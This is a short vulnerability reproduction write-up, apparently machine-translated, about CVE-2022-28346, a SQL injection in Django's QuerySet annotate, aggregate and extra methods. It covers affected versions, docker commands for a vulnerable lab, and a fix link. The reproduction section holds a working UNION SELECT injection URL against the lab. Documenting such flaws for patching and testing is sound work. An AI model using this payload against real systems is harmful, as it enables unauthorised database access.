Cve-2022-28346: Django SQL injection vulnerability

0x01 brief introduction
 

Django Yes, it is Python Developed a free open source Web frame , It almost covers Web Every aspect of application , Can be used to quickly build high performance 、 Elegant website ,Django It provides many modules often used in website background development , Enable developers to focus on the business part .

0x02 Summary of vulnerability
 

Hole number ：CVE-2022-28346

Attackers use a carefully crafted dictionary ,  adopt **kwargs Pass to QuerySet.annotate()、aggregate() and extra() These methods , This can cause these methods to be affected by SQL Injection attack .

0x03 Affects version

4.0 <= Django < 4.0.4

3.2 <= Django < 3.2.13

2.2 <= Django < 2.2.28

0x04 Environment building
​​​​​

docker pull s0cke3t/cve-2022-28346:latestdocker run -d -p 8080:8000  s0cke3t/cve-2022-28346

0x05 Loophole recurrence

You can find out which interfaces exist through the error reporting page

If the access interface has parameters , The error message will also be prompted

Use the parameters of the error prompt sql Inject

http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --

0x06 Repair method

The Security version has been officially released , Download address ：

https://www.djangoproject.com/download/